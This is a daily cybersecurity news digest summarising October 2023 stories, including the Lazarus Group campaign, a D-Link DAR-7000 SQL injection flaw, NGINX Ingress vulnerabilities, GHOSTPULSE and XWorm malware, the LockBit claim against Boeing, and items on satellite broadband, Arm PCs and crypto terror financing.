Daily Drop (638): India SAT: O3b mPOWER, Lazarus Group: TTP, D-Link DAR-7000, NGINX Ingress Controller, GHOSTPULSE Malware, Alan Turing's, LockBit: Boeing, XWorm, ARM, Terrorist: Crypto Financing
10-30-23
Monday, Oct 30, 2023 // (IG): BB // The Leek Sino-Satire // Coffee for Bob
India's First Satellite-based Gigabit Service Aims to Connect the Unconnected
Bottom Line Up Front (BLUF): Indian telco Reliance Jio Infocomm, known as Jio, showcased its new satellite broadband service, JioSpaceFiber, at the India Mobile Congress, marking it as India's first satellite-based gigabit service.
Analyst Comments: Jio's partnership with SES, owner of the O3b constellation of medium earth orbit (MEO) satellites, aims to provide gigabit-level connections similar to terrestrial fiber broadband connections. SES's O3b mPOWER satellites can scale to multiple gigabits per second, a significant improvement from their original generation. However, there have been launch delays due to reported glitches. JioSpaceFiber expands Jio's broadband services portfolio, aiming to cover unserved areas in India. Reliance Jio Infocomm chair, Akash Ambani, emphasized the potential reach of JioSpaceFiber. Jio also plans to use O3b for mobile backhaul capacity enhancement for Jio True5G in remote parts of India. The company has already connected JioSpaceFiber in four remote locations, which will serve as pilot areas before a proposed 2024 commercial service launch. The timeline might be influenced by the Department of Telecommunications (DoT) decisions regarding spectrum availability for commercial broadband satellite services in India.
FROM THE MEDIA: Reliance Jio Infocomm unveiled its satellite broadband service, JioSpaceFiber, in partnership with SES, aiming to provide gigabit-level connections. The service is a part of Jio's strategy to expand its broadband reach in unserved areas of India. The company aims for a full commercial launch in 2024, but regulatory decisions on spectrum availability might influence this timeline.
READ THE STORY: Developing Telecoms
Repeated Exploits Emphasize the Persistent Threat of the Lazarus Group and the Importance of Timely Patching
Bottom Line Up Front (BLUF): The Lazarus Group, identified as North Korean hackers, has initiated a new campaign targeting software vulnerabilities. This group is exploiting known flaws in a specific, yet unnamed, software version, even though patches for the vulnerabilities are available. By leveraging these vulnerabilities, the Lazarus Group aims to spread malware, compromising organizational security and encrypting web communication with digital certificates.
Analyst Comments: Kaspersky researchers identified that the Lazarus Group is targeting organizations globally, focusing on previously known vulnerabilities in a particular software. Although these vulnerabilities were reported and had patches available, the hackers exploited the older version of the software, intending to encrypt web communication using digital certificates. This strategy aligns with North Korea's broader objective of using cyber intrusions for espionage, financial gains, intelligence gathering, and other malicious activities. Notably, funds obtained from such cyber activities are alleged to support North Korea's missile and nuclear weapons programs. The Lazarus Group's malware, termed "SIGNBT," plays a pivotal role in initial infection, victim profiling, and payload delivery. Despite previous encounters with Lazarus, the developers of the affected software experienced multiple breaches, indicating a persistent threat, likely aiming at stealing valuable source code or tampering with the software supply chain.
FROM THE MEDIA: North Korean hackers from the Lazarus Group have launched a new campaign, focusing on exploiting known vulnerabilities in a specific software product. These vulnerabilities had been reported and patched, yet the group persists in targeting them. Their actions underscore a broader strategic approach by North Korea to leverage cyber capabilities for espionage, financial gains, and power projection. The ongoing and evolving nature of these threats necessitates a heightened level of awareness and preparedness among organizations and cybersecurity professionals.
READ THE STORY: GovInfoSec
D-Link DAR-7000 Faces Critical SQL Injection Vulnerability: CVE-2023-42406
Bottom Line Up Front (BLUF): A critical SQL injection vulnerability has been identified in the D-Link DAR-7000 device. This flaw allows malicious actors to exploit the vulnerability, potentially gaining unauthorized access to databases, modifying or deleting data, and obtaining administrative privileges on affected devices. A Proof-of-Concept (PoC) for this vulnerability has been published on GitHub, highlighting the risk associated with this flaw. The vulnerability has been officially designated as CVE-2023-42406.
Analyst Comments: The SQL injection vulnerability detected in the D-Link DAR-7000 device poses a significant security risk. Such vulnerabilities allow hackers to inject malicious SQL statements, potentially compromising the confidentiality, integrity, and availability of data. The Lazarus Group is known for exploiting these types of vulnerabilities, emphasizing the need for timely patching and vigilance. With the capability to target various database types, such as MySQL, MSSQL, Oracle, among others, malicious actors can use this technique to gain unauthorized access, make modifications, or even delete data. The vulnerability enables attackers to exploit the /sysmanage/editrole.php endpoint, leading to potential system compromise. The details of the PoC demonstrate the severity of the threat and the ease with which the system can be exploited if not patched.
FROM THE MEDIA: D-Link's DAR-7000 device is currently vulnerable to SQL injection attacks, which can have far-reaching consequences, including unauthorized data access and potential system compromise. The vulnerability, assigned CVE-2023-42406, is being analyzed to understand its potential impact fully. A PoC has been shared on GitHub, showcasing the exploitation process. Organizations using the D-Link DAR-7000 device are advised to apply necessary patches and remain vigilant against potential exploitation attempts.
READ THE STORY: GBhackers
NGINX Ingress Controller for Kubernetes: Vulnerabilities
Bottom Line Up Front (BLUF): Three critical, unpatched vulnerabilities have been identified in the NGINX Ingress controller for Kubernetes. These flaws can be exploited by malicious actors to steal sensitive cluster credentials.
Analyst Comments: Recently disclosed are three high-severity vulnerabilities in the NGINX Ingress controller for Kubernetes. The first, CVE-2022-4886, allows for a bypass of ingress-nginx path sanitization, which could provide unauthorized individuals access to the credentials of the ingress-nginx controller. The second, CVE-2023-5043, is an annotation injection flaw in ingress-nginx that has the potential to lead to arbitrary command execution. The final flaw, CVE-2023-5044, is a code injection vulnerability that can be triggered through a specific nginx.ingress.kubernetes.io annotation. Collectively, these vulnerabilities present a scenario where attackers with the capability to modify the Ingress object's configuration could steal secret credentials from the Kubernetes cluster. Given the prevalent use of the NGINX controller in Kubernetes environments, this presents a significant security concern for many organizations.
FROM THE MEDIA: The NGINX Ingress controller for Kubernetes has been identified as having three high-severity security flaws. These vulnerabilities, if left unaddressed, could be exploited by threat actors to extract secret credentials from the cluster, posing a significant risk to data integrity and security. Mitigations have been provided, but the underlying issues highlight the challenges of ensuring security in complex systems like Kubernetes.
READ THE STORY: THN
Counterfeit MSIX App Packages Used to Spread GHOSTPULSE Malware
Bottom Line Up Front (BLUF): A new malware loader named GHOSTPULSE has been discovered being distributed through counterfeit MSIX Windows app package files of popular software such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex. Once unsuspecting users install these malicious packages, GHOSTPULSE is stealthily downloaded onto the compromised system. The malware has the ability to initiate the execution of various final payloads, including SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport RAT.
Analyst Comments: The cyber attack campaign employs MSIX Windows app package files as a delivery mechanism for the GHOSTPULSE malware. MSIX is a Windows app package format that developers use for application packaging and distribution. However, the malicious campaign uses this format maliciously by requiring access to purchased or stolen code signing certificates. Attackers then lure potential targets to download the malicious MSIX packages through techniques like compromised websites, SEO poisoning, or malvertising. Upon launching the malicious MSIX file, users are prompted to click the "Install" button. If they comply, GHOSTPULSE is secretly downloaded from a remote server via a PowerShell script. The infection process is multi-staged, involving a TAR archive containing an executable that poses as the Oracle VM VirtualBox service but is actually a legitimate binary associated with Notepad++. The archive also contains a tampered DLL file that progresses the infection by exploiting a DLL side-loading vulnerability. The final stage loads GHOSTPULSE, which then acts as a loader to initiate the execution of various malware.
FROM THE MEDIA: A novel malware loader, GHOSTPULSE, is being distributed through counterfeit MSIX Windows app packages. The malware can lead to significant breaches, given its capability to load various other malware types. Users are advised to be wary of unsolicited MSIX package downloads and to ensure that software is downloaded from trusted sources.
READ THE STORY: THN
Alan Turing's Diagonalization: Unraveling the Uncomputable
Bottom Line Up Front (BLUF): Alan Turing, a pioneering computer scientist, introduced a groundbreaking concept that some problems cannot be solved algorithmically, known as "uncomputable" problems. He achieved this through a mathematical technique called diagonalization. This technique, while powerful, has its limitations in real-world applications, especially when dealing with complexities like the P versus NP problem in computational complexity theory.
Analyst Comments: Algorithms have become an integral part of our daily lives, aiding in optimization and problem-solving across various domains. However, not all problems can be solved through algorithms. Turing proved that certain problems, though defined in precise mathematical terms, are "uncomputable." Turing's strategy was based on diagonalization, a technique that has its origins in solving mundane problems involving strings of bits. This approach is faster than traditional methods, especially when dealing with vast datasets. Diagonalization's effectiveness even extends to infinite strings and lists. Turing's diagonalization was adapted from an approach used by Georg Cantor in set theory. Cantor initially used this method to demonstrate that some infinities are larger than others. Turing's adaptation gave the method a more contrarian nature, highlighting problems where no algorithm can find a solution.
FROM THE MEDIA: Alan Turing's utilization of the diagonalization technique highlighted the existence of problems that cannot be algorithmically solved. While this method is potent in theoretical scenarios, its application in real-world problems, such as the P versus NP problem, remains limited.
READ THE STORY: Wired
Boeing Under Ransomware Siege: LockBit's Latest High-Profile Target
Bottom Line Up Front (BLUF): LockBit ransomware gang claims to have extracted sensitive data from aerospace giant Boeing and threatens to release it unless engaged by November 2nd. The potential ramifications of this breach are vast, considering Boeing's extensive work with military clients.
Analyst Comments: The ransomware group, LockBit, has an established history of successful cyberattacks, having earned an estimated $91 million from U.S. victims since 2020. Boeing's involvement in projects of national significance, such as the construction of aircraft for the U.S. President, magnifies the potential implications of this breach. It's crucial to understand the gravity of this threat and consider it in the context of LockBit's track record and Boeing's pivotal role in the aerospace and defense sectors.
FROM THE MEDIA: The notorious ransomware gang, LockBit, has reportedly breached Boeing, extracting a significant amount of sensitive data. They've set a deadline for Boeing to respond, post which they threaten data exposure. This incident comes alongside other cybersecurity threats like the breach in Las Vegas's Clark County School District and vulnerabilities in major software. The situation underscores the persistent and sophisticated nature of cyber threats that major corporations and institutions face.
READ THE STORY: The Register
XWorm: The Evolving Threat of Malware-as-a-Service
Bottom Line Up Front (BLUF): XWorm, a Remote Access Trojan (RAT) sold as malware-as-a-service, is being used for multi-stage attacks. Originating from the ex-USSR in July 2022, the malware has evolved to version 5.0 as of August 2023 and poses a threat by stealing sensitive data, launching DDoS attacks, and deploying ransomware.
Analyst Comments: XWorm's capabilities are vast and multifaceted. It can extract sensitive data, including cryptocurrency information, initiate DDoS attacks, and set up ransomware. This malware has seen consistent updates, indicating its developers' commitment to keeping it relevant and challenging for cybersecurity professionals to counteract. Distributed mainly through phishing emails containing malicious Word documents, it uses a multi-stage attack mechanism. Once the document is opened, it triggers the download of the XWorm malware onto the victim's system. XWorm's features include encrypted communication with its C2 server, user activity tracking, information gathering, and account hijacking, among others. It is designed to persist on infected systems, bypassing User Account Control (UAC) to elevate its privileges and embedding itself into startup programs.
FROM THE MEDIA: XWorm represents a severe threat to cybersecurity. Its ability to evolve and adapt, combined with its multi-stage attack strategy and vast capabilities, makes it a formidable malware. Its origin from the ex-USSR and its continued development suggests a well-organized and possibly state-backed operation. The detailed report by ANY RUN provides deeper insights into its workings, but organizations and individuals should remain vigilant and employ advanced security measures against such threats.
READ THE STORY: GBhackers
Rethinking PC Dominance: The Rise of Arm-Compatible Devices
Bottom Line Up Front (BLUF): Intel's CEO, Pat Gelsinger, may be downplaying the rising influence of Arm-compatible PCs in the market. Given the current advancements and adoption rate of Arm technologies by major players like Apple, Qualcomm, and potentially Nvidia and AMD, there's a tangible shift in the PC landscape that suggests Arm's presence might grow significantly, challenging Intel's long-standing dominance.
Analyst Comments: Despite Pat Gelsinger's assertions that Arm PCs are an "insignificant" threat to Intel, the evolution and success of Arm-compatible chips in recent years suggest otherwise. Apple's M-series chips have showcased both performance and efficiency, often rivaling or exceeding Intel and AMD processors. Qualcomm is also entering the fray with its Snapdragon X Elite, boasting competitive performance metrics. With industry giants like Nvidia and possibly AMD exploring Arm-compatible CPUs and Microsoft's increasing support for Arm, the PC landscape could be on the cusp of a significant shift.
FROM THE MEDIA: Historically, x86 wasn't always the dominant PC architecture. Apple's transition from PowerPC to Intel in 2006 solidified x86's position. However, recent advancements by companies like Apple and Qualcomm in Arm-compatible chips indicate a potential shift in the market dynamics. Apple's M-series chips, for instance, have proven to be both powerful and efficient. Qualcomm's new Snapdragon X Elite SoC also promises competitive performance against Intel, AMD, and Apple. With rumors of Nvidia and AMD exploring Arm-compatible CPUs and Microsoft's growing support for Arm, the future of the PC market may see a larger presence of Arm-compatible devices, challenging Intel's dominance.
READ THE STORY: The Register
The Debate on 'Harvest Now, Decrypt Later' Attacks in the Age of Quantum Computing.
Bottom Line Up Front (BLUF): Cybercriminals may already be collecting encrypted data with the intention of decrypting it in the future when quantum computers are capable of breaking current encryption standards. This strategy, termed "harvest now, decrypt later" (HNDL), is an emerging concern for cybersecurity experts, as quantum advancements could potentially expose vast amounts of sensitive data.
Analyst Comments: The fundamental idea behind post-quantum encryption is to be prepared for the moment when quantum computers can crack current RSA encryption standards. There are increasing concerns that rogue actors might be gathering encrypted data now, planning to decrypt it once quantum computing reaches a stage where it can break present-day encryption. While certain experts and organizations, like Deloitte, acknowledge the theoretical threat of HNDL attacks, there's no concrete evidence that such attacks are currently happening. However, Western governments and companies are not taking chances. Efforts to develop post-quantum encryption standards have been accelerated, with institutions like the US National Institute for Standards and Technology (NIST) collaborating with global cryptographers. The recent Quantum Computing Cybersecurity Preparedness Act signed by President Biden is an example of the steps being taken to ensure preparedness for the quantum era.
FROM THE MEDIA: Quantum computing poses a potential threat to the current encryption standards, with the possibility of making them obsolete. The HNDL approach, where data is collected now for decryption in the future, is a looming concern. While there's a debate on whether such attacks are currently happening, the consensus is clear on the need for quantum-safe encryption strategies. Governments and corporations are actively investing in research and measures to counteract future quantum decryption capabilities.
READ THE STORY: TechMonitor
Items of interest
Debates Intensify Over Cryptocurrency's Role in Financing Terrorist Activities.
Bottom Line Up Front (BLUF): The U.S. government is intensifying its scrutiny on cryptocurrency firms that don't take adequate measures to prevent terrorist groups from moving funds. Deputy Treasury Secretary Wally Adeyemo emphasized that actions would be taken against non-compliant firms. This follows concerns raised by Sen. Elizabeth Warren and other members of Congress regarding the potential use of cryptocurrencies by terrorist groups.
Analyst Comments: The debate on the role of cryptocurrency in financing terrorism has garnered significant attention in Washington. Sen. Elizabeth Warren highlighted a report suggesting that terror groups, including Hamas and Palestinian Islamic Jihad, might have raised substantial funds in cryptocurrency. However, firms like Elliptic, which contributed data to this report, have contested the accuracy of these figures. They argue that the actual amount raised through cryptocurrencies might be far less than the cited numbers. The nature of cryptocurrencies, being anonymous and borderless, has been a long-standing concern among critics who believe it could be exploited by terror groups. However, the transparency of blockchain ledgers, where all transactions are recorded, serves as a counterpoint, enabling tracking of suspicious activities. Recent instances, like Hamas discontinuing Bitcoin fundraising due to tracking concerns, underline this point. While the potential of cryptocurrency being used for illicit activities cannot be dismissed, determining the actual scale and impact remains challenging.
FROM THE MEDIA: As cryptocurrencies become more mainstream, their potential misuse, especially in the context of terror financing, is under the lens. While there is an acknowledgment of this risk, there's also a debate on the scale of the problem. Efforts are being made both within the government and the crypto industry to address these concerns, ensuring that the digital financial world remains secure and doesn't inadvertently aid malicious actors.
READ THE STORY: Seattle Times
Terrorism and Crypto: Evidence from Ex-CIA Analyst (Video)
FROM THE MEDIA: Terrorist organizations have been testing cryptocurrency as a source of funding since it allows instant cross-border, censorship-resistant payments. Still, is Bitcoin really a sustainable source of funding for terrorists? To find out, we reached out to former CIA analyst Yaya Fanusie and Itsik Levy, CEO at Whitestream, a blockchain intelligence agency.
Michael Lewis on The Rise and Fall of FTX and Sam Bankman-Fried (Video)
FROM THE MEDIA: Michael Lewis is the renowned author of bestselling masterpieces, including Moneyball, The Big Short, Flash Boys and Liar’s Poker. This autumn, he is set to release his most anticipated book to date, which is likely to be one of 2023’s biggest sellers – Going Infinite: The Rise and Fall of a New Tycoon, a gripping, real-time narrative chronicling the enigmatic protagonist behind one of the most catastrophic financial meltdowns of the 21st century.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.